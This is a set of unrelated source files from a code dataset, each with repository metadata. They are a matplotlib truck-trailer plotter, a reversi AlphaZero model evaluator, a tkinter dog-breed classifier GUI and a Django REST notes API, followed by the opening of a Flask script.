+[cab_rectangle]\\\n +[hitch_circle]\\\n +drive_wheel_rectangles\\\n +wheel_rectangles\n \n item_number = 0\n item_rotation = []\n item_translation = []\n for item_number in range(len(truck_everything)-1):\n # rotate wheels\n item_rotation = item_rotation\\\n +[transforms.Affine2D().rotate_deg(steering_percentage\\\n *self.maximal_steering_angle\\\n *self.item_steering_rotations_truck[item_number])]\n # translate wheels\n item_translation = item_translation\\\n +[transforms.Affine2D().translate(self.item_translations_truck[item_number,0],\\\n self.item_translations_truck[item_number,1])]\n # rotate truck with wheels\n rotation_everything = transforms.Affine2D().rotate_deg(truck_rotation)\n # translate truck with wheels\n translation_everything = transforms.Affine2D().translate(truck_translation[0],\\\n truck_translation[1])\n \n for item_number in range(len(truck_everything)-1):\n item_transformation = item_rotation[item_number]\\\n +item_translation[item_number]\\\n +rotation_everything\\\n +translation_everything\\\n +self.ax.transData\n truck_everything[item_number].set_transform(item_transformation)\n self.ax.add_patch(truck_everything[item_number])\n \n ## first_trailer plotting\n if number_trailers != 0:\n wheel_rectangles = []\n first_trailer_everything = []\n first_trailer_rectangle = patches.Rectangle(-self.rotation_center_first_trailer,\\\n self.first_trailer_shape[0],\\\n self.first_trailer_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\n shaft_rectangle = patches.Rectangle(-self.shaft_shape/2,\\\n self.shaft_shape[0],\\\n self.shaft_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\n wheel_rectangles = [patches.Rectangle(-self.wheel_shape/2,\\\n self.wheel_shape[0],\\\n self.wheel_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\\\n for wheel_number in range(5)]\n \n if number_trailers == 1:\n first_trailer_everything = [first_trailer_rectangle]\\\n +[shaft_rectangle]\\\n +wheel_rectangles\n \n if number_trailers == 2:\n hitch_circle = patches.Circle((0, 0),\\\n self.hitch_radius,\\\n color=\"black\",\\\n alpha=0.50)\n first_trailer_everything = [first_trailer_rectangle]\\\n +[shaft_rectangle]\\\n +[hitch_circle]\\\n +wheel_rectangles\n \n item_number = 0\n item_rotation = []\n item_translation = []\n for item_number in range(len(first_trailer_everything)-1):\n # rotate wheels\n item_rotation = 
item_rotation\\\n +[transforms.Affine2D().rotate_deg(-first_trailer_rotation\\\n *self.item_steering_rotations_first_trailer[item_number])]\n # translate wheels\n item_translation = item_translation\\\n +[transforms.Affine2D().translate(self.item_translations_first_trailer[item_number,0],\\\n self.item_translations_first_trailer[item_number,1])]\n # rotate first_trailer with wheels\n rotation_everything = transforms.Affine2D().rotate_deg(truck_rotation\\\n +first_trailer_rotation)\n # translate first_trailer with wheels\n translation_everything = transforms.Affine2D().translate(truck_translation[0]\\\n +self.hitch_translation_truck\\\n *np.cos(np.deg2rad(truck_rotation))\\\n -self.hitch_translation_first_trailer_truck\\\n *np.cos(np.deg2rad(truck_rotation\\\n +first_trailer_rotation)),\\\n truck_translation[1]\\\n +self.hitch_translation_truck\\\n *np.sin(np.deg2rad(truck_rotation))\\\n -self.hitch_translation_first_trailer_truck\\\n *np.sin(np.deg2rad(truck_rotation\\\n +first_trailer_rotation)))\n \n for item_number in range(len(first_trailer_everything)-1):\n item_transformation = item_rotation[item_number]\\\n +item_translation[item_number]\\\n +rotation_everything\\\n +translation_everything\\\n +self.ax.transData\n first_trailer_everything[item_number].set_transform(item_transformation)\n self.ax.add_patch(first_trailer_everything[item_number])\n \n ## second_trailer plotting \n if number_trailers == 2:\n wheel_rectangles = []\n second_trailer_everything = []\n second_trailer_rectangle = patches.Rectangle(-self.rotation_center_second_trailer,\\\n self.second_trailer_shape[0],\\\n self.second_trailer_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\n wheel_rectangles = [patches.Rectangle(-self.wheel_shape/2,\\\n self.wheel_shape[0],\\\n self.wheel_shape[1],\\\n color=\"black\",\\\n alpha=0.50)\\\n for wheel_number in range(7)]\n second_trailer_everything = [second_trailer_rectangle]\\\n +wheel_rectangles\n \n item_number = 0\n item_rotation = []\n item_translation = []\n for item_number in range(len(second_trailer_everything)-1):\n # rotate wheels\n item_rotation = item_rotation\\\n +[transforms.Affine2D().rotate_deg(-second_trailer_rotation\\\n *self.item_steering_rotations_second_trailer[item_number])]\n # translate wheels\n item_translation = item_translation\\\n +[transforms.Affine2D().translate(self.item_translations_second_trailer[item_number,0],\\\n self.item_translations_second_trailer[item_number,1])]\n # rotate second_trailer with wheels\n rotation_everything = transforms.Affine2D().rotate_deg(truck_rotation\\\n +first_trailer_rotation\\\n +second_trailer_rotation)\n # translate second_trailer with wheels\n translation_everything = transforms.Affine2D().translate(truck_translation[0]\\\n +self.hitch_translation_truck\\\n *np.cos(np.deg2rad(truck_rotation))\\\n +(-self.hitch_translation_first_trailer_truck\\\n +self.hitch_translation_first_trailer_second_trailer)\\\n *np.cos(np.deg2rad(truck_rotation\\\n +first_trailer_rotation))\\\n -self.hitch_translation_second_trailer\\\n *np.cos(np.deg2rad(truck_rotation\\\n +first_trailer_rotation\\\n +second_trailer_rotation)),\\\n truck_translation[1]\\\n +self.hitch_translation_truck\\\n *np.sin(np.deg2rad(truck_rotation))\\\n +(-self.hitch_translation_first_trailer_truck\\\n +self.hitch_translation_first_trailer_second_trailer)\\\n *np.sin(np.deg2rad(truck_rotation\\\n +first_trailer_rotation))\\\n -self.hitch_translation_second_trailer\\\n *np.sin(np.deg2rad(truck_rotation\\\n +first_trailer_rotation\\\n +second_trailer_rotation)))\n 
\n for item_number in range(len(second_trailer_everything)-1):\n item_transformation = item_rotation[item_number]\\\n +item_translation[item_number]\\\n +rotation_everything\\\n +translation_everything\\\n +self.ax.transData\n second_trailer_everything[item_number].set_transform(item_transformation)\n self.ax.add_patch(second_trailer_everything[item_number])\n\n plt.pause(self.pause_time)\n", "repo_name": "MechatronixX/TrailerReverse", "sub_path": "visualisation/Visualize_combination_code.py", "file_name": "Visualize_combination_code.py", "file_ext": "py", "file_size_in_byte": 20263, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.pyplot.ion", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 130, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 135, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.patches.Circle", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 152, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", 
"line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.patches.Circle", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 217, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 232, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 232, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 236, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 239, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 242, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 242, "usage_type": "name"}, {"api_name": "numpy.cos", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 252, "usage_type": "call"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 268, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 268, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 273, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 273, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 288, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 295, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 295, "usage_type": "name"}, {"api_name": "matplotlib.transforms.Affine2D", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.transforms", "line_number": 299, "usage_type": "name"}, {"api_name": "numpy.cos", "line_number": 301, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 301, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 307, 
"usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 307, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 318, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}]} +{"seq_id": "19763485086", "text": "import os\nfrom logging import getLogger\nfrom random import random\nfrom time import sleep\n\nfrom reversi_zero.agent.model import ReversiModel\nfrom reversi_zero.agent.player import ReversiPlayer\nfrom reversi_zero.config import Config\nfrom reversi_zero.env.reversi_env import ReversiEnv, Player, Winner\nfrom reversi_zero.lib import tf_util\nfrom reversi_zero.lib.data_helper import get_next_generation_model_dirs\nfrom reversi_zero.lib.model_helpler import save_as_best_model, load_best_model_weight\n\nlogger = getLogger(__name__)\n\n\ndef start(config: Config):\n tf_util.set_session_config(per_process_gpu_memory_fraction=0.2)\n return EvaluateWorker(config).start()\n\n\nclass EvaluateWorker:\n def __init__(self, config: Config):\n \"\"\"\n\n :param config:\n \"\"\"\n self.config = config\n self.best_model = None\n\n def start(self):\n self.best_model = self.load_best_model()\n\n while True:\n ng_model, model_dir = self.load_next_generation_model()\n logger.debug(f\"start evaluate model {model_dir}\")\n ng_is_great = self.evaluate_model(ng_model)\n if ng_is_great:\n logger.debug(f\"New Model become best model: {model_dir}\")\n save_as_best_model(ng_model)\n self.best_model = ng_model\n self.remove_model(model_dir)\n\n def evaluate_model(self, ng_model):\n results = []\n winning_rate = 0\n for game_idx in range(self.config.eval.game_num):\n # ng_win := if ng_model win -> 1, lose -> 0, draw -> None\n ng_win, black_is_best, black_white = self.play_game(self.best_model, ng_model)\n if ng_win is not None:\n results.append(ng_win)\n winning_rate = sum(results) / len(results)\n logger.debug(f\"game {game_idx}: ng_win={ng_win} black_is_best_model={black_is_best} score={black_white} \"\n f\"winning rate {winning_rate*100:.1f}%\")\n if results.count(0) >= self.config.eval.game_num * (1-self.config.eval.replace_rate):\n logger.debug(f\"lose count reach {results.count(0)} so give up challenge\")\n break\n if results.count(1) >= self.config.eval.game_num * self.config.eval.replace_rate:\n logger.debug(f\"win count reach {results.count(1)} so change best model\")\n break\n\n winning_rate = sum(results) / len(results)\n logger.debug(f\"winning rate {winning_rate*100:.1f}%\")\n return winning_rate >= self.config.eval.replace_rate\n\n def play_game(self, best_model, ng_model):\n env = ReversiEnv().reset()\n\n best_player = ReversiPlayer(self.config, best_model, play_config=self.config.eval.play_config)\n ng_player = ReversiPlayer(self.config, ng_model, play_config=self.config.eval.play_config)\n best_is_black = random() < 0.5\n if best_is_black:\n black, white = best_player, ng_player\n else:\n black, white = ng_player, best_player\n\n observation = env.observation\n while not env.done:\n if env.next_player == Player.black:\n action = black.action(observation.black, observation.white)\n else:\n action 
= white.action(observation.white, observation.black)\n observation, info = env.step(action)\n\n ng_win = None\n if env.winner == Winner.black:\n if best_is_black:\n ng_win = 0\n else:\n ng_win = 1\n elif env.winner == Winner.white:\n if best_is_black:\n ng_win = 1\n else:\n ng_win = 0\n return ng_win, best_is_black, observation.number_of_black_and_white\n\n def load_best_model(self):\n model = ReversiModel(self.config)\n load_best_model_weight(model)\n return model\n\n def load_next_generation_model(self):\n rc = self.config.resource\n while True:\n dirs = get_next_generation_model_dirs(self.config.resource)\n if dirs:\n break\n logger.info(f\"There is no next generation model to evaluate\")\n sleep(60)\n model_dir = dirs[-1] if self.config.eval.evaluate_latest_first else dirs[0]\n config_path = os.path.join(model_dir, rc.next_generation_model_config_filename)\n weight_path = os.path.join(model_dir, rc.next_generation_model_weight_filename)\n model = ReversiModel(self.config)\n model.load(config_path, weight_path)\n return model, model_dir\n\n def remove_model(self, model_dir):\n rc = self.config.resource\n config_path = os.path.join(model_dir, rc.next_generation_model_config_filename)\n weight_path = os.path.join(model_dir, rc.next_generation_model_weight_filename)\n os.remove(config_path)\n os.remove(weight_path)\n os.rmdir(model_dir)\n", "repo_name": "mokemokechicken/reversi-alpha-zero", "sub_path": "src/reversi_zero/worker/evaluate.py", "file_name": "evaluate.py", "file_ext": "py", "file_size_in_byte": 4899, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 658, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "reversi_zero.config.Config", "line_number": 17, "usage_type": "name"}, {"api_name": "reversi_zero.lib.tf_util.set_session_config", "line_number": 18, "usage_type": "call"}, {"api_name": "reversi_zero.lib.tf_util", "line_number": 18, "usage_type": "name"}, {"api_name": "reversi_zero.config.Config", "line_number": 23, "usage_type": "name"}, {"api_name": "reversi_zero.lib.model_helpler.save_as_best_model", "line_number": 40, "usage_type": "call"}, {"api_name": "reversi_zero.env.reversi_env.ReversiEnv", "line_number": 67, "usage_type": "call"}, {"api_name": "reversi_zero.agent.player.ReversiPlayer", "line_number": 69, "usage_type": "call"}, {"api_name": "reversi_zero.agent.player.ReversiPlayer", "line_number": 70, "usage_type": "call"}, {"api_name": "random.random", "line_number": 71, "usage_type": "call"}, {"api_name": "reversi_zero.env.reversi_env.Player.black", "line_number": 79, "usage_type": "attribute"}, {"api_name": "reversi_zero.env.reversi_env.Player", "line_number": 79, "usage_type": "name"}, {"api_name": "reversi_zero.env.reversi_env.Winner.black", "line_number": 86, "usage_type": "attribute"}, {"api_name": "reversi_zero.env.reversi_env.Winner", "line_number": 86, "usage_type": "name"}, {"api_name": "reversi_zero.env.reversi_env.Winner.white", "line_number": 91, "usage_type": "attribute"}, {"api_name": "reversi_zero.env.reversi_env.Winner", "line_number": 91, "usage_type": "name"}, {"api_name": "reversi_zero.agent.model.ReversiModel", "line_number": 99, "usage_type": "call"}, {"api_name": "reversi_zero.lib.model_helpler.load_best_model_weight", "line_number": 100, "usage_type": "call"}, {"api_name": "reversi_zero.lib.data_helper.get_next_generation_model_dirs", "line_number": 106, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 110, "usage_type": 
"call"}, {"api_name": "os.path.join", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "reversi_zero.agent.model.ReversiModel", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path", "line_number": 121, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 122, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 123, "usage_type": "call"}, {"api_name": "os.rmdir", "line_number": 124, "usage_type": "call"}]} +{"seq_id": "39872405330", "text": "# coding: utf-8\n\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nfrom tkinter import filedialog\nimport os\n\nfrom testme import Predict\n\nclass Window:\n\n\tdef __init__(self,classifier):\n\n\t\t#the most demanding function is loaded before application\n\t\tself.predict = Predict(classifier)\n\n\t\t#the main tkinter app\n\t\tself.root = Tk()\n\n\t\tself.root.title(\"Dog Breed Classifier\")\n\t\t#can't resize the window\n\t\tself.root.resizable(width=False, height=False)\n\n\t\t#create an empty filename in order to create the label\n\t\tself.filename=\"\"\n\n\t\t#label of the image's path\n\t\tself.pathtext = Label(self.root, text=self.filename)\n\t\tself.pathtext.grid(row=1,column=1)\n\n\t\t#label of the prediction\n\t\tself.predictiontext = Label(self.root, text=\"\")\n\t\tself.predictiontext.grid(row=2,column=1)\n\n\t\t#default image displayed\n\t\tself.open_img(\"FirstDog.jpg\")\n\n\t\t#button to load a new image\n\t\tbtn = Button(self.root, text='open image', command=self.open_img)\n\t\tbtn.grid(row=1,column=0)\n\n\t\t#button to launch the prediction\n\t\tbtn = Button(self.root, text='Run', command=self.getPredict)\n\t\tbtn.grid(row=2,column=0)\n\n\t\t#main loop of the tkinter window, create all the content before calling it\n\t\tself.root.mainloop()\n\n\tdef getPredict(self):\n\t\t\"\"\"\n\t\t\tHere we call the function that predicts a new image \n\t\t\"\"\"\n\n\t\t#the attribute allows to have a returned result\n\t\tprediction = self.predict.run(self.filename,printPrediction=True)\n\n\t\t#set the prediction label\n\t\tself.predictiontext[\"text\"] = \"Best match : \"+prediction\n\n\tdef openfn(self):\n\t\t\"\"\"\n\t\t\topen a dialog box to return the path of an image\n\t\t\"\"\"\n\t\tself.filename = filedialog.askopenfilename(title='Choose an image',\n\t\t\tfiletypes=[('jpg', '.jpg'),('jpeg', '.jpeg')])\n\n\tdef open_img(self,path=None,verbose=True):\n\t\t\"\"\"\n\t\t\tLoad a new image according to the path\n\t\t\tGo place the image in the window\n\t\t\"\"\"\n\t\t#have a default image which is load at the begining\n\t\t#otherwise have to charge an other one\n\t\tif path==None:\n\t\t\tself.openfn()\n\t\telse:\n\t\t\tself.filename=path\n\n\t\t#display the image loaded in the console\n\t\tif verbose:\n\t\t\tprint(\"=================\")\n\t\t\tprint(\"File open :\",self.filename)\n\n\t\t#keep the name of the img and not the whole path\n\t\tself.pathtext[\"text\"] = self.filename.split('/')[-1]\n\n\t\t#the image will be resized, it may look strange\n\t\timg = Image.open(self.filename)\n\t\timg = img.resize((400, 400), Image.ANTIALIAS)\n\t\timg = 
ImageTk.PhotoImage(img)\n\n\t\t#the new image is placed in the same position\n\t\tpanel = Label(self.root, image=img)\n\t\tpanel.image = img\n\t\tpanel.grid(row=0, column=0, columnspan=2, rowspan=1,\n\t\t sticky=W+E+N+S, padx=5, pady=5)\n\n\n\nif __name__ == \"__main__\":\n\t#Default classifier\n\tclassifier = \"dog_classifier.tfl.ckpt-24700\"\n\twindow=Window(classifier)\n", "repo_name": "jokfun/Dog_Breed_Classifier", "sub_path": "window.py", "file_name": "window.py", "file_ext": "py", "file_size_in_byte": 2707, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "testme.Predict", "line_number": 15, "usage_type": "call"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 64, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 64, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 88, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 89, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 89, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 90, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 90, "usage_type": "name"}]} +{"seq_id": "26073652114", "text": "from rest_framework.request import Request\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view,APIView\nfrom .models import Note\nfrom .serializers import NoteSerializer\nfrom django.shortcuts import get_object_or_404\n\n@api_view(http_method_names=[\"GET\", \"POST\"])\ndef homepage(request: Request):\n if request.method == \"POST\":\n data = request.data\n response = {\"message\": \"Hello world\", \"data\": data}\n return Response(data=response, status=status.HTTP_201_CREATED)\n response = {\"message\": \"Hello World\"}\n return Response(data=response, status=status.HTTP_200_OK)\n\nclass NoteListCreateView(APIView):\n \"\"\"\n View for creating and listing Notes\n \"\"\"\n serializer_class = NoteSerializer\n def get(self, request:Request, *args, **kwargs):\n notes = Note.objects.all()\n serializer = self.serializer_class(instance=notes, many=True)\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n \n def post(self, request:Request, *args, **kwargs):\n data = request.data\n serializer = self.serializer_class(data=data)\n \n if serializer.is_valid():\n serializer.save()\n response = {\n \"message\": \"Note Created\",\n \"data\": serializer.data\n }\n return Response(data=response, status=status.HTTP_201_CREATED)\n return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \nclass NoteRetrieveUpdateDeleteView(APIView):\n serializer_class = NoteSerializer\n\n def get(self, request:Request, note_id:int):\n note = get_object_or_404(Note, pk=note_id)\n serializer = self.serializer_class(instance=note)\n\n return Response(data=serializer.data, status=status.HTTP_200_OK)\n pass\n\n def put(self, request:Request, note_id:int):\n note = get_object_or_404(Note, pk=note_id)\n data = request.data\n serializer =self.serializer_class(instance=note, data=data)\n if serializer.is_valid():\n serializer.save()\n response = {\n \"message\": \"Note updated\",\n \"data\": serializer.data\n }\n return Response(data=response, status = status.HTTP_200_OK)\n return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request:Request, 
note_id:int):\n note = get_object_or_404(Note, pk=note_id)\n note.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n pass\n ", "repo_name": "jamestha3d/OTO_notes", "sub_path": "api/class_views.py", "file_name": "class_views.py", "file_ext": "py", "file_size_in_byte": 2610, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.request.Request", "line_number": 10, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 14, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 14, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 14, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 16, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 16, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 16, "usage_type": "name"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 9, "usage_type": "call"}, {"api_name": "rest_framework.decorators.APIView", "line_number": 18, "usage_type": "name"}, {"api_name": "serializers.NoteSerializer", "line_number": 22, "usage_type": "name"}, {"api_name": "rest_framework.request.Request", "line_number": 23, "usage_type": "name"}, {"api_name": "models.Note.objects.all", "line_number": 24, "usage_type": "call"}, {"api_name": "models.Note.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "models.Note", "line_number": 24, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 26, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 26, "usage_type": "name"}, {"api_name": "rest_framework.request.Request", "line_number": 28, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 38, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 38, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 38, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 39, "usage_type": "name"}, {"api_name": "rest_framework.decorators.APIView", "line_number": 41, "usage_type": "name"}, {"api_name": "serializers.NoteSerializer", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.request.Request", "line_number": 44, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Note", "line_number": 45, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 48, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 48, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.request.Request", "line_number": 51, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 52, "usage_type": "call"}, {"api_name": "models.Note", "line_number": 52, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", 
"line_number": 61, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 61, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 61, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 62, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 62, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 62, "usage_type": "name"}, {"api_name": "rest_framework.request.Request", "line_number": 64, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 65, "usage_type": "call"}, {"api_name": "models.Note", "line_number": 65, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 67, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 67, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "15226305215", "text": "#Steps\r\n#1. Add Link with correct ???_all\r\n#2, Copy def and add ???all\r\n#3. Add database name in def\r\n#4. Change name in route\r\n\r\n#def configure_app(app):\r\n# Configure Compressing\r\n# Compress(app)\r\n\r\n#import flask_cache\r\n#from flask_cache import Cache\r\n#cache = Cache()\r\n#https://stackoverflow.com/questions/43263356/prevent-flask-jsonify-from-sorting-the-data/43263483#43263483 \r\n#https://docs.python.org/2/library/sqlite3.html\r\n#Ref 1: https://stackoverflow.com/questions/3783238/python-database-connection-close\r\n\r\nCOMPRESS_MIMETYPES = ['text/html', 'text/css', 'text/xml', 'application/json', 'application/javascript']\r\nCOMPRESS_LEVEL = 6\r\nCOMPRESS_MIN_SIZE = 500\r\n\r\nimport itertools\r\nimport pyodbc \r\nimport flask\r\nfrom flask import request, jsonify\r\nfrom flask_restful import Resource, Api, request\r\nfrom flask import Flask\r\n\t\r\napp = 